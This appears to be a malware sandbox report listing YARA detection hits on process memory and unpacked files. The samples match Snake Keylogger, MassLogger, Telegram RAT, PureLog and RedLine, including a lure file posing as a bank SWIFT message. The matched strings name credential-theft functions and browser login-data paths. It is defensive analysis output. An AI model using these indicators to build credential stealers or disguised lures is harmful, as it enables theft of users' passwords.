00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1e240:$a1: get_encryptedPassword 0x1e214:$a2: get_encryptedUsername 0x1e2d8:$a3: get_timePasswordChanged 0x1e1f0:$a4: get_passwordField 0x1e256:$a5: set_encryptedPassword 0x1e023:$a7: get_logins 0x1d5ad:$a8: GetOutlookPasswords 0x1cad6:$a9: StartKeylogger 0x1b438:$a10: KeyLoggerEventArgs 0x1b407:$a11: KeyLoggerEventArgsEventHandler 0x1e0f7:$a13: _encryptedPassword
0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76bb4:$a1: get_encryptedPassword 0x76b88:$a2: get_encryptedUsername 0x76c4c:$a3: get_timePasswordChanged 0x76b64:$a4: get_passwordField 0x76bca:$a5: set_encryptedPassword 0x76997:$a7: get_logins 0x721fe:$a10: KeyLoggerEventArgs 0x721cd:$a11: KeyLoggerEventArgsEventHandler 0x76a6b:$a13: _encryptedPassword
00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.2954971703.00000000025AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x232d0:$a1: get_encryptedPassword 0x4cfe8:$a1: get_encryptedPassword 0x232a4:$a2: get_encryptedUsername 0x4cfbc:$a2: get_encryptedUsername 0x23368:$a3: get_timePasswordChanged 0x4d080:$a3: get_timePasswordChanged 0x23280:$a4: get_passwordField 0x4cf98:$a4: get_passwordField 0x232e6:$a5: set_encryptedPassword 0x4cffe:$a5: set_encryptedPassword 0x230b3:$a7: get_logins 0x4cdcb:$a7: get_logins 0x2263d:$a8: GetOutlookPasswords 0x4c355:$a8: GetOutlookPasswords 0x21b66:$a9: StartKeylogger 0x4b87e:$a9: StartKeylogger 0x204c8:$a10: KeyLoggerEventArgs 0x4a1e0:$a10: KeyLoggerEventArgs 0x20497:$a11: KeyLoggerEventArgsEventHandler 0x4a1af:$a11: KeyLoggerEventArgsEventHandler 0x23187:$a13: _encryptedPassword
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Ziraat_Bankasi_Swift_Messaji.png.exe PID: 2344	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7380	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7380	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7380	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7380	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcc26:$a1: get_encryptedPassword 0x1ef37:$a1: get_encryptedPassword 0x3982e:$a1: get_encryptedPassword 0x701d7:$a1: get_encryptedPassword 0xc0214:$a1: get_encryptedPassword 0xcbfa:$a2: get_encryptedUsername 0x1ef0b:$a2: get_encryptedUsername 0x39802:$a2: get_encryptedUsername 0x701ab:$a2: get_encryptedUsername 0xc01e8:$a2: get_encryptedUsername 0xccbe:$a3: get_timePasswordChanged 0x1efcf:$a3: get_timePasswordChanged 0x398c6:$a3: get_timePasswordChanged 0x7026f:$a3: get_timePasswordChanged 0xc02ac:$a3: get_timePasswordChanged 0xcbd6:$a4: get_passwordField 0x1eee7:$a4: get_passwordField 0x397de:$a4: get_passwordField 0x70187:$a4: get_passwordField 0xc01c4:$a4: get_passwordField 0xcc3c:$a5: set_encryptedPassword
Process Memory Space: Native_snake01.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Native_snake01.exe PID: 7396	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Native_snake01.exe PID: 7396	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Native_snake01.exe PID: 7396	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15e771:$a1: get_encryptedPassword 0x17dcc3:$a1: get_encryptedPassword 0x18b4d0:$a1: get_encryptedPassword 0x19896b:$a1: get_encryptedPassword 0x15e745:$a2: get_encryptedUsername 0x17dc97:$a2: get_encryptedUsername 0x18b4a4:$a2: get_encryptedUsername 0x19893f:$a2: get_encryptedUsername 0x15e809:$a3: get_timePasswordChanged 0x17dd5b:$a3: get_timePasswordChanged 0x18b568:$a3: get_timePasswordChanged 0x198a03:$a3: get_timePasswordChanged 0x15e721:$a4: get_passwordField 0x17dc73:$a4: get_passwordField 0x18b480:$a4: get_passwordField 0x19891b:$a4: get_passwordField 0x15e787:$a5: set_encryptedPassword 0x17dcd9:$a5: set_encryptedPassword 0x18b4e6:$a5: set_encryptedPassword 0x198981:$a5: set_encryptedPassword 0x15e55d:$a7: get_logins
Process Memory Space: BZTCUCKTKd.exe PID: 7576	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7800	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7800	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7800	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Native_New-Nova.exe PID: 7800	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x512e:$a1: get_encryptedPassword 0x41421:$a1: get_encryptedPassword 0x6417c:$a1: get_encryptedPassword 0x830a9:$a1: get_encryptedPassword 0x9d640:$a1: get_encryptedPassword 0x5102:$a2: get_encryptedUsername 0x413f5:$a2: get_encryptedUsername 0x64150:$a2: get_encryptedUsername 0x8307d:$a2: get_encryptedUsername 0x9d614:$a2: get_encryptedUsername 0x51c6:$a3: get_timePasswordChanged 0x414b9:$a3: get_timePasswordChanged 0x64214:$a3: get_timePasswordChanged 0x83141:$a3: get_timePasswordChanged 0x9d6d8:$a3: get_timePasswordChanged 0x50de:$a4: get_passwordField 0x413d1:$a4: get_passwordField 0x6412c:$a4: get_passwordField 0x83059:$a4: get_passwordField 0x9d5f0:$a4: get_passwordField 0x5144:$a5: set_encryptedPassword
Process Memory Space: Native_snake01.exe PID: 7820	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Native_snake01.exe PID: 7820	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Native_snake01.exe PID: 7820	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Native_snake01.exe PID: 7820	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7011:$a1: get_encryptedPassword 0x58ddb:$a1: get_encryptedPassword 0x81b1b:$a1: get_encryptedPassword 0x22abde:$a1: get_encryptedPassword 0x6fe5:$a2: get_encryptedUsername 0x58daf:$a2: get_encryptedUsername 0x81aef:$a2: get_encryptedUsername 0x22abb2:$a2: get_encryptedUsername 0x70a9:$a3: get_timePasswordChanged 0x58e73:$a3: get_timePasswordChanged 0x81bb3:$a3: get_timePasswordChanged 0x22ac76:$a3: get_timePasswordChanged 0x6fc1:$a4: get_passwordField 0x58d8b:$a4: get_passwordField 0x81acb:$a4: get_passwordField 0x22ab8e:$a4: get_passwordField 0x7027:$a5: set_encryptedPassword 0x58df1:$a5: set_encryptedPassword 0x81b31:$a5: set_encryptedPassword 0x22abf4:$a5: set_encryptedPassword 0x6dfd:$a7: get_logins
Click to see the 127 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.0.Native_snake01.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.Native_New-Nova.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.0.Native_snake01.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.Native_New-Nova.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.214183e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.4a80000.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.4a80000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.4a80f08.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.4a80f08.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.23e0000.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.23e0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.Native_New-Nova.exe.3425570.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3425570.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3425570.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.3425570.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3425570.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.3425570.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3425570.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
9.3.Native_New-Nova.exe.5993e8.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
9.3.Native_New-Nova.exe.5993e8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
